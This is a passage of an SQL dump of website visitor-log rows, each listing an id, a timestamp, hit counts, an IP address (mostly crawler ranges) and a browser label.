,0,0,'87.250.224.65','other'),(407363,1554000899,1,1,0,0,'54.36.148.231','other'),(407364,1554001037,1,1,0,0,'54.36.150.55','other'),(407365,1554001062,1,1,0,0,'66.249.64.31','chrome'),(407366,1554001103,1,1,0,0,'5.45.207.79','other'),(407367,1554001391,1,1,0,0,'54.36.150.87','other'),(407368,1554001518,2,2,0,0,'66.249.64.58','chrome'),(407369,1554001715,1,1,0,0,'46.229.168.145','other'),(407370,1554001916,1,1,0,0,'54.36.150.106','other'),(407371,1554002002,4,4,0,0,'66.249.64.30','chrome'),(407372,1554002153,1,1,0,0,'46.229.168.138','other'),(407373,1554002266,2,2,0,0,'54.186.80.179','chrome'),(407374,1554002304,2,2,0,0,'66.249.64.29','chrome'),(407375,1554002802,1,1,0,0,'66.249.64.60','chrome'),(407376,1554002830,1,1,0,0,'54.36.150.33','other'),(407377,1554002843,1,1,0,0,'40.77.167.105','other'),(407378,1554003070,1,1,0,0,'54.36.149.63','other'),(407379,1554003595,1,1,0,0,'195.128.17.206','other'),(407380,1554003746,1,1,0,0,'40.77.167.1','other'),(407381,1554003898,1,1,0,0,'54.36.148.1','other'),(407382,1554004057,1,1,0,0,'54.36.149.4','other'),(407383,1554004112,1,1,0,0,'46.229.168.148','other'),(407384,1554004263,1,1,0,0,'40.77.167.175','other'),(407385,1554004363,1,1,0,0,'54.36.148.91','other'),(407386,1554004674,1,1,0,0,'54.36.148.196','other'),(407387,1554004742,1,1,0,0,'46.229.168.147','other'),(407388,1554004762,5,5,0,0,'66.249.64.29','chrome'),(407389,1554004903,3,3,0,0,'66.249.64.31','chrome'),(407390,1554004914,1,1,0,0,'54.36.150.33','other'),(407391,1554004915,5,5,0,0,'66.249.64.30','chrome'),(407393,1554004949,1,1,0,0,'157.55.39.144','other'),(407394,1554005202,1,1,0,0,'46.229.168.154','other'),(407395,1554005363,1,1,0,0,'66.249.64.62','chrome'),(407396,1554005548,1,1,0,0,'54.36.150.37','other'),(407397,1554005550,1,1,0,0,'46.229.168.133','other'),(407398,1554005595,1,1,0,0,'8.29.198.27','other'),(407399,1554005669,1,1,0,0,'54.36.149.48','other'),(407400,1554005700,1,1,0,0,'54.36.148.162','other'),(407401,1554005797,1,1,0,0,'8.29.198.26','other'),(407402,1554006599,1,1,0,0,'46.229.168.137','other'),(407403,1554006932,1,1,0,0,'40.77.167.175','other'),(407404,1554007185,1,1,0,0,'54.36.150.15','other'),(407405,1554007207,1,1,0,0,'66.249.64.30','chrome'),(407406,1554007306,3,3,0,0,'5.45.207.19','other'),(407407,1554007392,1,1,0,0,'178.154.244.11','other'),(407408,1554007776,1,1,0,0,'46.229.168.135','other'),(407409,1554007863,1,1,0,0,'54.36.149.71','other'),(407410,1554008072,1,1,0,0,'66.249.64.31','chrome'),(407411,1554008159,1,1,0,0,'46.229.168.130','other'),(407412,1554008421,1,1,0,0,'46.229.168.142','other'),(407413,1554008646,2,2,0,0,'66.249.64.29','chrome'),(407414,1554008696,1,1,0,0,'54.36.148.137','other'),(407415,1554009190,1,1,0,0,'54.36.148.46','other'),(407416,1554009219,1,1,0,0,'46.229.168.133','other'),(407417,1554009567,1,1,0,0,'46.229.168.137','other'),(407418,1554009641,1,1,0,0,'54.36.148.67','other'),(407419,1554009902,2,2,0,0,'66.249.64.29','chrome'),(407420,1554010009,1,1,0,0,'54.36.148.79','other'),(407421,1554010142,1,1,0,0,'66.249.64.62','chrome'),(407422,1554010310,1,1,0,0,'54.36.150.89','other'),(407423,1554010483,1,1,0,0,'54.36.148.187','other'),(407424,1554010704,1,1,0,0,'193.201.225.45','other'),(407425,1554010882,1,1,0,0,'54.36.148.28','other'),(407426,1554010912,1,1,0,0,'178.137.17.200','chrome'),(407427,1554011253,1,1,0,0,'66.249.64.29','chrome'),(407428,1554011320,1,1,0,0,'40.77.167.175','other'),(407429,1554011555,3,3,0,0,'66.249.64.30','chrome'),(407430,1554011572,1,1,0,0,'54.36.148.26','other'),(407431,1554011745,1,1,0,0,'207.46.13.19','other'),(407432,1554011854,1,1,0,0,'66.249.64.31','chrome'),(407433,1554012148,1,1,0,0,'54.36.148.139','other'),(407434,1554012306,1,1,0,0,'66.249.64.62','chrome'),(407435,1554012653,1,1,0,0,'54.36.148.173','other'),(407436,1554012878,1,1,0,0,'54.36.150.142','other'),(407437,1554012972,1,1,0,0,'54.36.150.46','other'),(407438,1554013072,1,1,0,0,'54.36.149.30','other'),(407439,1554013116,1,1,0,0,'54.36.148.106','other'),(407440,1554013117,1,1,0,0,'46.229.168.146','other'),(407441,1554013126,1,1,0,0,'66.249.64.30','chrome'),(407442,1554013200,1,1,0,0,'66.249.64.60','chrome'),(407443,1554013234,1,1,0,0,'54.36.150.165','other'),(407444,1554013244,1,1,0,0,'54.36.148.125','other'),(407445,1554013540,1,1,0,0,'54.36.150.98','other'),(407446,1554013819,1,1,0,0,'54.36.150.84','other'),(407447,1554013900,1,1,0,0,'54.36.150.19','other'),(407448,1554014512,1,1,0,0,'46.229.168.149','other'),(407449,1554014537,2,2,0,0,'5.45.207.79','other'),(407450,1554014613,1,1,0,0,'54.36.148.148','other'),(407451,1554014851,1,1,0,0,'37.9.113.103','other'),(407452,1554015023,1,1,0,0,'178.154.244.11','other'),(407453,1554015065,1,1,0,0,'46.229.168.152','other'),(407454,1554015126,1,1,0,0,'54.36.150.15','other'),(407455,1554015216,1,1,0,0,'37.9.113.148','other'),(407456,1554015385,1,1,0,0,'54.36.150.134','other'),(407457,1554015510,1,1,0,0,'54.36.148.171','other'),(407458,1554015557,1,1,0,0,'54.36.148.61','other'),(407459,1554015646,3,3,0,0,'66.249.64.30','chrome'),(407460,1554015963,1,1,0,0,'46.229.168.136','other'),(407461,1554016064,2,2,0,0,'66.249.64.31','chrome'),(407462,1554016439,2,2,0,0,'8.29.198.25','other'),(407463,1554016542,1,1,0,0,'54.36.149.57','other'),(407464,1554016607,1,1,0,0,'54.36.149.107','other'),(407465,1554016966,1,1,0,0,'54.36.150.85','other'),(407466,1554016976,1,1,0,0,'54.36.148.116','other'),(407467,1554017079,1,1,0,0,'66.249.64.30','chrome'),(407468,1554017132,1,1,0,0,'54.36.149.82','other'),(407469,1554017155,1,1,0,0,'54.36.150.155','other'),(407470,1554017170,1,1,0,0,'46.229.168.140','other'),(407471,1554017478,1,1,0,0,'91.196.178.171','chrome'),(407472,1554017719,1,1,0,0,'54.36.148.178','other'),(407473,1554018244,1,1,0,0,'66.249.64.60','chrome'),(407474,1554018289,1,1,0,0,'66.249.64.29','chrome'),(407475,1554018410,3,3,0,0,'66.249.64.30','chrome'),(407476,1554018658,1,1,0,0,'54.36.148.184','other'),(407477,1554018676,1,1,0,0,'54.36.150.121','other'),(407478,1554018951,1,1,0,0,'40.77.167.175','other'),(407479,1554019424,1,1,0,0,'46.229.168.134','other'),(407480,1554019429,2,2,0,0,'66.249.64.29','chrome'),(407481,1554019433,1,1,0,0,'66.249.64.31','chrome'),(407482,1554020561,1,1,0,0,'54.36.150.9','other'),(407483,1554020568,1,1,0,0,'54.36.148.203','other'),(407484,1554020602,3,3,0,0,'66.249.64.30','chrome'),(407485,1554020647,1,1,0,0,'66.249.64.31','chrome'),(407486,1554021263,1,1,0,0,'54.36.150.121','other'),(407487,1554021307,1,1,0,0,'54.36.148.56','other'),(407488,1554021504,1,1,0,0,'54.36.148.85','other'),(407489,1554021939,1,1,0,0,'54.36.149.3','other'),(407490,1554022476,1,1,0,0,'54.36.150.131','other'),(407491,1554022644,1,1,0,0,'54.36.149.40','other'),(407492,1554022663,1,1,0,0,'54.36.148.108','other'),(407493,1554022796,1,1,0,0,'54.36.148.129','other'),(407494,1554022890,1,1,0,0,'40.77.167.175','other'),(407495,1554022907,1,1,0,0,'46.229.168.142','other'),(407496,1554022974,3,3,0,0,'178.154.244.11','other'),(407497,1554023037,1,1,0,0,'54.36.148.91','other'),(407498,1554023080,1,1,0,0,'66.249.64.31','chrome'),(407499,1554023562,1,1,0,0,'46.229.168.140','other'),(407500,1554023743,1,1,0,0,'66.249.64.30','chrome'),(407501,1554024048,1,1,0,0,'54.36.150.133','other'),(407502,1554024211,1,1,0,0,'66.249.64.29','chrome'),(407503,1554024363,1,1,0,0,'54.36.148.62','other'),(407504,1554024690,1,1,0,0,'207.46.13.19','other'),(407505,1554024938,1,1,0,0,'54.36.148.120','other'),(407506,1554025070,1,1,0,0,'46.229.168.154','other'),(407507,1554025461,1,1,0,0,'40.77.167.175','other'),(407508,1554025739,1,1,0,0,'54.36.149.62','other'),(407509,1554025834,1,1,0,0,'54.36.149.65','other'),(407510,1554025999,2,2,0,0,'66.249.64.30','chrome'),(407511,1554026146,1,1,0,0,'66.249.64.58','chrome'),(407512,1554026205,1,1,0,0,'54.36.149.61','other'),(407513,1554026476,1,1,0,0,'54.36.149.47','other'),(407514,1554026493,1,1,0,0,'40.77.167.175','other'),(407515,1554026642,2,2,0,0,'46.229.168.145','other'),(407516,1554026718,1,1,0,0,'66.249.64.29','chrome'),(407517,1554026745,1,1,0,0,'46.229.168.148','other'),(407518,1554026830,1,1,0,0,'46.229.168.154','other'),(407519,1554027275,2,2,0,0,'8.29.198.27','other'),(407520,1554027372,1,1,0,0,'66.249.64.58','chrome'),(407521,1554027395,1,1,0,0,'54.36.148.88','other'),(407522,1554027478,1,1,0,0,'54.36.148.240','other'),(407523,1554027606,1,1,0,0,'54.36.148.136','other'),(407524,1554027789,1,1,0,0,'46.229.168.137','other'),(407525,1554027859,1,1,0,0,'40.77.167.30','other'),(407526,1554027861,1,1,0,0,'54.36.148.51','other'),(407527,1554028222,1,1,0,0,'106.38.241.66','other'),(407528,1554028993,1,1,0,0,'66.249.64.30','chrome'),(407529,1554029568,1,1,0,0,'46.211.122.82','chrome'),(407530,1554030195,1,1,0,0,'66.249.64.58','chrome'),(407531,1554030243,1,1,0,0,'5.45.207.79','other'),(407532,1554030254,1,1,0,0,'40.77.167.36','other'),(407533,1554030270,1,1,0,0,'54.36.148.160','other'),(407534,1554030291,1,1,0,0,'54.36.149.99','other'),(407535,1554030418,3,3,0,0,'66.249.64.30','chrome'),(407536,1554030559,1,1,0,0,'37.9.113.148','other'),(407537,1554030640,2,2,0,0,'87.250.224.47','other'),(407538,1554030706,1,1,0,0,'37.9.113.20','other'),(407539,1554030709,1,1,0,0,'178.154.244.11','other'),(407540,1554030962,2,2,0,0,'54.36.150.83','other'),(407541,1554030974,1,1,0,0,'95.108.181.54','other'),(407542,1554030978,1,1,0,0,'178.154.171.27','other'),(407543,1554031010,1,1,0,0,'87.250.224.64','other'),(407544,1554031105,1,1,0,0,'46.229.168.148','other'),(407545,1554031243,1,1,0,0,'54.36.148.124','other'),(407546,1554031253,1,1,0,0,'40.77.167.175','other'),(407547,1554031330,1,1,0,0,'66.249.64.30','chrome'),(407548,1554031406,1,1,0,0,'46.229.168.139','other'),(407549,1554031437,1,1,0,0,'46.229.168.154','other'),(407550,1554031516,1,1,0,0,'54.36.150.66','other'),(407551,1554032135,1,1,0,0,'54.36.148.195','other'),(407552,1554032288,1,1,0,0,'66.249.64.30','chrome'),(407553,1554032310,1,1,0,0,'54.36.150.9','other'),(407554,1554032487,1,1,0,0,'54.36.150.170','other'),(407555,1554032770,1,1,0,0,'54.36.148.4','other'),(407556,1554033136,1,1,0,0,'46.229.168.145','other'),(407557,1554033264,1,1,0,0,'54.36.150.65','other'),(407558,1554033314,1,1,0,0,'54.36.148.115','other'),(407559,1554033381,1,1,0,0,'66.249.64.30','chrome'),(407560,1554033447,1,1,0,0,'207.46.13.228','other'),(407561,1554033818,1,1,0,0,'54.36.148.35','other'),(407562,1554033887,1,1,0,0,'40.77.167.129','other'),(407563,1554033980,1,1,0,0,'66.249.64.58','chrome'),(407564,1554034332,1,1,0,0,'46.229.168.142','other'),(407565,1554034353,1,1,0,0,'93.75.169.211','firefox'),(407566,1554034637,1,1,0,0,'54.36.149.71','other'),(407567,1554034962,1,1,0,0,'54.36.148.157','other'),(407568,1554035249,1,1,0,0,'207.46.13.228','other'),(407569,1554035262,2,2,0,0,'66.249.64.31','chrome'),(407570,1554035724,1,1,0,0,'54.36.148.255','other'),(407571,1554035756,1,1,0,0,'54.36.150.59','other'),(407572,1554035767,1,1,0,0,'66.249.64.30','chrome'),(407573,1554035778,1,1,0,0,'54.36.150.10','other'),(407574,1554035837,1,1,0,0,'212.90.45.139','firefox'),(407575,1554036136,1,1,0,0,'54.36.148.229','other'),(407576,1554036714,1,1,0,0,'46.229.168.154','other'),(407577,1554036937,1,1,0,0,'54.36.148.50','other'),(407578,1554037144,1,1,0,0,'46.229.168.161','other'),(407579,1554037176,1,1,0,0,'207.46.13.228','other'),(407580,1554037290,1,1,0,0,'40.77.167.36','other'),(407581,1554037297,1,1,0,0,'66.249.64.60','chrome'),(407582,1554037951,1,1,0,0,'46.229.168.153','other'),(407583,1554038003,1,1,0,0,'66.249.64.29','chrome'),(407584,1554038080,2,1,1,0,'66.249.64.30',''),(407585,1554038126,1,1,0,0,'8.29.198.25','other'),(407586,1554038212,1,1,0,0,'40.77.167.36','other'),(407587,1554038358,1,1,0,0,'8.29.198.26','other'),(407588,1554038684,1,1,0,0,'54.36.149.46','other'),(407589,1554038743,1,1,0,0,'54.36.148.220','other'),(407590,1554038762,1,1,0,0,'31.184.238.175','chrome'),(407591,1554038801,1,1,0,0,'54.36.150.177','other'),(407592,1554038847,1,1,0,0,'54.36.150.1','other'),(407593,1554038901,1,1,0,0,'66.249.64.31','chrome'),(407594,1554038905,1,1,0,0,'54.36.150.149','other'),(407595,1554038913,1,1,0,0,'66.249.64.30','chrome'),(407596,1554038964,1,1,0,0,'178.154.171.27','other'),(407597,1554039124,1,1,0,0,'54.36.150.110','other'),(407598,1554039237,1,1,0,0,'54.36.149.63','other'),(407599,1554039359,1,1,0,0,'66.249.64.60','chrome'),(407600,1554039764,1,1,0,0,'54.36.148.117','other'),(407601,1554040124,1,1,0,0,'54.36.150.87','other'),(407602,1554040257,1,1,0,0,'54.36.149.34','other'),(407603,1554040336,1,1,0,0,'46.229.168.144','other'),(407604,1554040457,1,1,0,0,'66.249.64.60','chrome'),(407605,1554040470,1,1,0,0,'54.36.148.63','other'),(407606,1554040782,1,1,0,0,'54.36.149.15','other'),(407607,1554041113,1,1,0,0,'46.229.168.163','other'),(407608,1554041219,1,1,0,0,'66.249.64.31','chrome'),(407609,1554042053,1,1,0,0,'46.229.168.144','other'),(407610,1554042139,1,1,0,0,'157.55.39.177','other'),(407611,1554042598,1,1,0,0,'66.249.64.58','chrome'),(407612,1554042892,1,1,0,0,'54.36.150.83','other'),(407613,1554043382,1,1,0,0,'54.36.150.84','other'),(407614,1554043428,1,1,0,0,'54.36.148.223','other'),(407615,1554043470,1,1,0,0,'46.229.168.148','other'),(407616,1554043648,1,1,0,0,'66.249.64.30','chrome'),(407617,1554043850,1,1,0,0,'46.229.168.135','other'),(407618,1554044219,2,2,0,0,'66.249.64.29','chrome'),(407619,1554044244,1,1,0,0,'54.36.149.23','other'),(407620,1554044523,1,1,0,0,'66.249.64.60','chrome'),(407621,1554044774,1,1,0,0,'54.36.150.107','other'),(407622,1554044799,1,1,0,0,'46.229.168.161','other'),(407623,1554045033,1,1,0,0,'46.229.168.163','other'),(407624,1554045182,1,1,0,0,'54.36.150.10','other'),(407625,1554045191,1,1,0,0,'54.36.148.185','other'),(407626,1554045239,1,1,0,0,'54.36.148.170','other'),(407627,1554045302,1,1,0,0,'95.108.213.4','other'),(407628,1554045838,3,3,0,0,'66.249.64.31','chrome'),(407629,1554045996,1,1,0,0,'54.36.148.199','other'),(407630,1554046041,1,1,0,0,'54.36.148.20','other'),(407631,1554046251,1,1,0,0,'54.36.150.74','other'),(407632,1554046339,1,1,0,0,'54.36.148.248','other'),(407633,1554046383,1,1,0,0,'46.229.168.148','other'),(407634,1554046545,1,1,0,0,'54.36.148.193','other'),(407635,1554046807,1,1,0,0,'54.36.148.143','other'),(407636,1554046820,1,1,0,0,'66.249.64.31','chrome'),(407637,1554046906,1,1,0,0,'54.36.148.200','other'),(407638,1554047528,1,1,0,0,'46.229.168.132','other'),(407639,1554047771,1,1,0,0,'54.36.150.41','other'),(407640,1554047821,1,1,0,0,'54.36.148.242','other'),(407641,1554048013,1,1,0,0,'54.36.149.14','other'),(407642,1554048149,1,1,0,0,'54.36.148.225','other'),(407643,1554048286,1,1,0,0,'54.36.149.97','other'),(407644,1554048674,1,1,0,0,'46.229.168.135','other'),(407645,1554048716,1,1,0,0,'54.36.148.203','other'),(407646,1554048880,1,1,0,0,'5.45.207.19','other'),(407647,1554048950,1,1,0,0,'46.229.168.144','other'),(407648,1554048951,1,1,0,0,'8.29.198.26','other'),(407649,1554048984,3,3,0,0,'178.154.244.11','other'),(407650,1554049109,1,1,0,0,'54.36.150.47','other'),(407651,1554049133,1,1,0,0,'40.77.167.129','other'),(407652,1554049166,1,1,0,0,'54.36.150.163','other'),(407653,1554049178,1,1,0,0,'40.77.167.36','other'),(407654,1554049207,1,1,0,0,'8.29.198.25','other'),(407655,1554049224,1,1,0,0,'46.229.168.132','other'),(407656,1554049396,1,1,0,0,'54.36.150.101','other'),(407657,1554049405,1,1,0,0,'95.108.213.4','other'),(407658,1554049547,1,1,0,0,'46.229.168.139','other'),(407659,1554049680,1,1,0,0,'54.36.148.209','other'),(407660,1554049882,1,1,0,0,'54.36.150.52','other'),(407661,1554050355,1,1,0,0,'66.249.64.60','chrome'),(407662,1554050625,2,2,0,0,'66.249.64.29','chrome'),(407663,1554050944,1,1,0,0,'54.36.150.9','other'),(407664,1554051029,1,1,0,0,'66.249.64.31','chrome'),(407665,1554051427,1,1,0,0,'46.211.130.118','chrome'),(407666,1554051602,1,1,0,0,'54.36.148.215','other'),(407667,1554051723,1,1,0,0,'54.36.149.66','other'),(407668,1554052124,1,1,0,0,'46.229.168.139','other'),(407669,1554052281,1,1,0,0,'46.229.168.136','other'),(407670,1554052405,1,1,0,0,'40.77.167.36','other'),(407671,1554052462,1,1,0,0,'54.36.148.12','other'),(407672,1554052483,1,1,0,0,'46.229.168.150','other'),(407673,1554052741,1,1,0,0,'54.36.149.45','other'),(407674,1554053055,1,1,0,0,'54.36.148.31','other'),(407675,1554053346,1,1,0,0,'54.36.149.62','other'),(407676,1554053396,1,1,0,0,'54.36.150.74','other'),(407677,1554053491,1,1,0,0,'40.77.167.129','other'),(407678,1554054088,1,1,0,0,'207.46.13.228','other'),(407679,1554054286,1,1,0,0,'54.36.148.219','other'),(407680,1554054338,1,1,0,0,'54.36.150.54','other'),(407681,1554054487,1,1,0,0,'54.36.149.100','other'),(407682,1554054555,1,1,0,0,'54.36.150.72','other'),(407683,1554054815,2,2,0,0,'66.249.64.30','chrome'),(407684,1554054926,1,1,0,0,'54.36.148.46','other'),(407685,1554055021,32,32,0,0,'5.9.156.30','other'),(407686,1554055128,1,1,0,0,'54.36.148.169','other'),(407687,1554055438,1,1,0,0,'54.36.149.56','other'),(407688,1554055439,1,1,0,0,'54.36.149.52','other'),(407689,1554055441,134,134,0,0,'144.76.176.171','other'),(407690,1554056017,1,1,0,0,'66.249.64.31','chrome'),(407691,1554056454,1,1,0,0,'54.36.148.237','other'),(407692,1554056815,1,1,0,0,'54.36.148.160','other'),(407693,1554056874,1,1,0,0,'54.36.150.140','other'),(407694,1554056985,1,1,0,0,'54.36.148.183','other'),(407695,1554057043,1,1,0,0,'54.36.150.141','other'),(407696,1554057070,1,1,0,0,'54.36.148.126','other'),(407697,1554057073,1,1,0,0,'54.36.149.69','other'),(407698,1554057215,1,1,0,0,'54.36.148.146','other'),(407699,1554057325,2,2,0,0,'207.46.13.229','other'),(407700,1554057403,1,1,0,0,'54.36.149.84','other'),(407701,1554057555,1,1,0,0,'54.36.148.180','other'),(407702,1554057579,3,3,0,0,'66.249.64.31','chrome'),(407703,1554057846,1,1,0,0,'91.196.178.186','chrome'),(407704,1554058025,1,1,0,0,'54.36.149.98','other'),(407705,1554058431,1,1,0,0,'66.249.64.29','chrome'),(407706,1554058548,1,1,0,0,'46.229.168.143','other'),(407707,1554058965,2,2,0,0,'141.8.142.103','other'),(407708,1554059040,4,4,0,0,'5.45.207.79','other'),(407709,1554059345,1,1,0,0,'66.249.64.29','chrome'),(407710,1554059405,1,1,0,0,'66.249.64.30','chrome'),(407711,1554059447,1,1,0,0,'91.196.178.186','chrome'),(407712,1554059487,2,2,0,0,'178.154.244.11','other'),(407713,1554059604,1,1,0,0,'40.77.167.36','other'),(407714,1554059785,1,1,0,0,'8.29.198.27','other'),(407715,1554059821,1,1,0,0,'87.250.224.65','other'),(407716,1554059857,1,1,0,0,'54.36.150.112','other'),(407717,1554060049,1,1,0,0,'8.29.198.26','other'),(407718,1554060113,1,1,0,0,'54.36.148.215','other'),(407719,1554060325,1,1,0,0,'141.8.142.103','other'),(407720,1554060332,1,1,0,0,'54.36.150.84','other'),(407721,1554060439,1,1,0,0,'54.36.150.135','other'),(407722,1554060701,1,1,0,0,'46.229.168.132','other'),(407723,1554060794,1,1,0,0,'54.36.149.52','other'),(407724,1554061760,1,1,0,0,'5.45.207.19','other'),(407725,1554061861,1,1,0,0,'54.36.148.97','other'),(407726,1554061870,1,1,0,0,'54.36.148.9','other'),(407727,1554062451,1,1,0,0,'54.36.148.146','other'),(407728,1554062555,1,1,0,0,'54.36.150.64','other'),(407729,1554062802,1,1,0,0,'54.36.150.186','other'),(407730,1554063092,1,1,0,0,'91.196.178.92','chrome'),(407731,1554063297,1,1,0,0,'54.36.148.46','other'),(407732,1554063317,1,1,0,0,'54.36.150.114','other'),(407733,1554063325,1,1,0,0,'46.229.168.130','other'),(407734,1554063544,1,1,0,0,'46.229.168.138','other'),(407735,1554063827,1,1,0,0,'66.249.64.60','chrome'),(407736,1554063845,1,1,0,0,'46.229.168.142','other'),(407737,1554064109,1,1,0,0,'66.249.64.31','chrome'),(407738,1554064397,1,1,0,0,'46.229.168.147','other'),(407739,1554064688,1,1,0,0,'207.46.13.229','other'),(407740,1554065158,1,1,0,0,'54.36.148.54','other'),(407741,1554065231,1,1,0,0,'54.36.148.140','other'),(407742,1554065234,1,1,0,0,'54.36.150.50','other'),(407743,1554065273,1,1,0,0,'54.36.148.147','other'),(407744,1554065415,30,30,0,0,'85.10.206.20','other'),(407745,1554065468,1,1,0,0,'54.36.150.184','other'),(407746,1554065834,1,1,0,0,'66.249.64.29','chrome'),(407747,1554065953,1,1,0,0,'54.36.148.21','other'),(407748,1554065955,1,1,0,0,'66.249.64.31','chrome'),(407749,1554066406,1,1,0,0,'54.36.149.71','other'),(407750,1554066481,1,1,0,0,'54.36.150.36','other'),(407751,1554066710,1,1,0,0,'66.249.64.60','chrome'),(407752,1554066749,1,1,0,0,'46.229.168.136','other'),(407753,1554066757,1,1,0,0,'54.36.148.118','other'),(407754,1554066857,1,1,0,0,'54.36.148.125','other'),(407755,1554066905,1,1,0,0,'66.249.64.29','chrome'),(407756,1554067323,1,1,0,0,'54.36.149.102','other'),(407757,1554068103,1,1,0,0,'54.36.150.131','other'),(407758,1554068306,1,1,0,0,'66.249.64.30','chrome'),(407759,1554068387,1,1,0,0,'54.36.149.84','other'),(407760,1554068636,1,1,0,0,'40.77.167.13','other'),(407761,1554068723,1,1,0,0,'66.249.64.60','chrome'),(407762,1554068727,1,1,0,0,'40.77.167.50','other'),(407763,1554068745,1,1,0,0,'54.36.149.87','other'),(407764,1554069273,1,1,0,0,'54.36.150.66','other'),(407765,1554069387,1,1,0,0,'46.229.168.152','other'),(407766,1554069392,1,1,0,0,'46.229.168.142','other'),(407767,1554069439,1,1,0,0,'54.36.149.2','other'),(407768,1554069854,1,1,0,0,'46.96.1.42','chrome'),(407769,1554070133,1,1,0,0,'54.36.148.145','other'),(407770,1554070367,1,1,0,0,'46.229.168.146','other'),(407771,1554070482,1,1,0,0,'54.36.148.111','other'),(407772,1554070604,1,1,0,0,'54.36.148.35','other'),(407773,1554070613,2,2,0,0,'8.29.198.25','other'),(407774,1554071005,1,1,0,0,'5.45.207.19','other'),(407775,1554071096,1,1,0,0,'5.45.207.79','other'),(407776,1554071268,1,1,0,0,'37.9.113.148','other'),(407777,1554071271,1,1,0,0,'178.154.244.11','other'),(407778,1554071633,1,1,0,0,'54.36.150.132','other'),(407779,1554071692,1,1,0,0,'46.229.168.136','other'),(407780,1554071875,1,1,0,0,'54.36.149.7','other'),(407781,1554071947,1,1,0,0,'91.196.178.175','chrome'),(407782,1554072065,1,1,0,0,'66.249.64.31','chrome'),(407783,1554072183,1,1,0,0,'54.36.150.85','other'),(407784,1554072502,4,4,0,0,'66.249.64.30','chrome'),(407785,1554072566,1,1,0,0,'40.77.167.13','other'),(407786,1554072656,1,1,0,0,'54.36.148.217','other'),(407787,1554072812,1,1,0,0,'54.36.149.79','other'),(407788,1554073047,1,1,0,0,'66.249.64.31','chrome'),(407789,1554073067,1,1,0,0,'66.249.64.29','chrome'),(407790,1554073324,1,1,0,0,'66.249.64.62','chrome'),(407791,1554073368,1,1,0,0,'54.36.148.178','other'),(407792,1554073414,1,1,0,0,'54.36.148.52','other'),(407793,1554073419,1,1,0,0,'54.36.148.48','other'),(407794,1554073873,1,1,0,0,'46.229.168.138','other'),(407795,1554073945,1,1,0,0,'54.36.148.93','other'),(407796,1554074003,1,1,0,0,'54.36.148.133','other'),(407797,1554074483,1,1,0,0,'66.249.64.30','chrome'),(407798,1554074491,2,2,0,0,'66.249.64.29','chrome'),(407799,1554074521,1,1,0,0,'54.36.150.73','other'),(407800,1554074623,1,1,0,0,'66.249.64.31','chrome'),(407801,1554074631,1,1,0,0,'54.36.150.159','other'),(407802,1554074742,2,2,0,0,'40.77.167.36','other'),(407803,1554074841,1,1,0,0,'54.36.148.215','other'),(407804,1554075053,1,1,0,0,'54.36.150.95','other'),(407805,1554075341,1,1,0,0,'54.36.148.18','other'),(407806,1554075466,1,1,0,0,'66.249.64.29','chrome'),(407807,1554075627,1,1,0,0,'66.249.64.30','chrome'),(407808,1554075877,1,1,0,0,'66.249.64.58','chrome'),(407809,1554075904,1,1,0,0,'66.249.64.62','chrome'),(407810,1554076170,1,1,0,0,'54.36.148.67','other'),(407811,1554076258,1,1,0,0,'54.36.150.148','other'),(407812,1554076421,1,1,0,0,'109.74.154.72','chrome'),(407813,1554076752,1,1,0,0,'54.36.148.86','other'),(407814,1554077080,1,1,0,0,'54.36.148.68','other'),(407815,1554077382,1,1,0,0,'54.36.148.21','other'),(407816,1554077395,1,1,0,0,'157.55.39.235','other'),(407817,1554077544,1,1,0,0,'54.36.148.226','other'),(407818,1554077648,1,1,0,0,'54.36.148.194','other'),(407819,1554077663,1,1,0,0,'157.55.39.245','other'),(407820,1554077968,1,1,0,0,'66.249.64.60','chrome'),(407821,1554078071,1,1,0,0,'54.36.148.209','other'),(407822,1554078174,1,1,0,0,'46.229.168.145','other'),(407823,1554078360,1,1,0,0,'46.229.168.129','other'),(407824,1554078459,1,1,0,0,'66.249.64.30','chrome'),(407825,1554078518,1,1,0,0,'157.55.39.252','other'),(407826,1554078623,1,1,0,0,'54.36.148.248','other'),(407827,1554078677,1,1,0,0,'54.36.150.43','other'),(407828,1554078893,1,1,0,0,'46.229.168.163','other'),(407829,1554078899,1,1,0,0,'37.120.158.184','firefox'),(407830,1554079185,1,1,0,0,'46.229.168.133','other'),(407831,1554079254,1,1,0,0,'54.36.149.77','other'),(407832,1554079540,1,1,0,0,'54.81.225.130','chrome'),(407833,1554080004,1,1,0,0,'54.36.150.154','other'),(407834,1554080454,1,1,0,0,'46.229.168.153','other'),(407835,1554080886,1,1,0,0,'66.249.64.30','chrome'),(407836,1554081151,1,1,0,0,'46.229.168.144','other'),(407837,1554081252,1,1,0,0,'54.36.150.85','other'),(407838,1554081447,1,1,0,0,'8.29.198.26','other'),(407839,1554081531,1,1,0,0,'54.36.148.134','other'),(407840,1554081706,1,1,0,0,'66.249.64.62','chrome'),(407841,1554081718,2,2,0,0,'60.191.38.77','firefox'),(407842,1554081762,1,1,0,0,'8.29.198.27','other'),(407843,1554081798,1,1,0,0,'54.36.149.38','other'),(407844,1554081883,1,1,0,0,'54.36.150.176','other'),(407845,1554081931,1,1,0,0,'207.46.13.148','other'),(407846,1554082169,1,1,0,0,'54.36.149.85','other'),(407847,1554082974,1,1,0,0,'46.229.168.149','other'),(407848,1554083402,1,1,0,0,'46.229.168.151','other'),(407849,1554083428,1,1,0,0,'5.45.207.19','other'),(407850,1554083449,1,1,0,0,'87.250.224.65','other'),(407851,1554083631,1,1,0,0,'66.249.64.60','chrome'),(407852,1554083641,2,2,0,0,'37.9.113.148','other'),(407853,1554083651,1,1,0,0,'54.36.149.64','other'),(407854,1554083731,2,2,0,0,'95.108.213.4','other'),(407855,1554083742,1,1,0,0,'54.36.150.75','other'),(407856,1554083885,1,1,0,0,'141.8.142.103','other'),(407857,1554083966,2,2,0,0,'66.249.64.29','chrome'),(407858,1554084037,1,1,0,0,'54.36.148.23','other'),(407859,1554084068,1,1,0,0,'54.36.150.59','other'),(407860,1554084124,1,1,0,0,'66.249.64.31','chrome'),(407861,1554084680,1,1,0,0,'66.249.64.30','chrome'),(407862,1554084739,1,1,0,0,'5.45.207.79','other'),(407863,1554085150,1,1,0,0,'54.36.148.41','other'),(407864,1554085221,1,1,0,0,'178.154.244.11','other'),(407865,1554085791,1,1,0,0,'54.36.150.62','other'),(407866,1554085831,1,1,0,0,'54.36.150.20','other'),(407867,1554085929,1,1,0,0,'54.36.148.33','other'),(407868,1554086093,1,1,0,0,'217.69.143.67','other'),(407869,1554086266,2,2,0,0,'34.208.214.125','chrome'),(407870,1554086293,1,1,0,0,'54.36.148.99','other'),(407871,1554086654,1,1,0,0,'66.249.64.29','chrome'),(407872,1554086797,1,1,0,0,'54.36.